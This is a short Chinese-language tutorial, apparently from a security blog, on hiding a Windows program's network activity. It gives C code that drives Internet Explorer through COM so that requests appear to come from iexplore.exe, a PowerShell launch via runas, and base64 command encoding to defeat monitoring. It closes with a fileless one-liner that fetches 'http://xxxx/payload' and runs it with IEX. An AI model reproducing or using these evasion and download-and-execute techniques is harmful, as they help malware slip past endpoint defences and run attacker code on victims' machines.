0x1.主机程序通过相关调用com组件代码,调用IE去访问网络
特点: 网络请求的父进程是iexplore.exe,而不是自身
#include<stdio.h>
#include<windows.h>
#include<exdisp.h>
int main()
{
if (SUCCEEDED(OleInitialize(NULL)))//在当前模块上先初始化COM,然后才能调用除CoGetMalloc和内存分配函数以外的COM库函数。
{
IWebBrowser2* pBrowser2;
HRESULT hr;
IDispatch* pHtmlDoc = NULL;
CoCreateInstance(CLSID_InternetExplorer, NULL, CLSCTX_LOCAL_SERVER,
IID_IWebBrowser2, (void**)&pBrowser2);//主机程序启动IE
if (pBrowser2)
{
VARIANT vEmpty;
VariantInit(&vEmpty);
BSTR bstrURL = SysAllocString(L"https://blog.csdn.net/superchickenchicken/article/details/102695335");
HRESULT hr = pBrowser2->Navigate(bstrURL, &vEmpty, &vEmpty,&vEmpty, &vEmpty);
if (SUCCEEDED(hr))
{
hr = pBrowser2->put_Visible(VARIANT_TRUE);
hr = pBrowser2->get_Document(&pHtmlDoc);//获取活动文档的自动化对象(如果有)
}
else
{
pBrowser2->Quit();
}
SysFreeString(bstrURL);
pBrowser2->Release();
}
OleUninitialize();
}
}
触发访问请求,成功访问
当前进程进程树
0x2 C语言调用powershell
#include<stdio.h>
#include<windows.h>
#include<exdisp.h>
int main()
{
ShellExecute(HWND_DESKTOP,"runas","powershell.exe","$ieObject= New-Object -ComObject \'InternetExplorer.Application\';$ieObject.Visible= $true;$ieObject.Navigate(\'https://blog.csdn.net/superchickenchicken\')", NULL, SW_SHOWNORMAL);
return 0;
}
用moniter还是可以抓到,用下面脚本加密一下
$fileContent = “所要编码的脚本”
$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand
c语言部分代码中的powershell 执行命令 改成
powshell -enc + $encodedCommand
0x3 powershell命令直接访问网络下载文件
$client = new-object System.Net.WebClient
$client.DownString('1.1.1.1/a')
0x4 无文件下载执行
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));
$o.Open("GET", "http://xxxx/payload", $False); $o.Send();
IEX $o.responseText;
参考链接:https://www.freebuf.com/articles/system/207966.html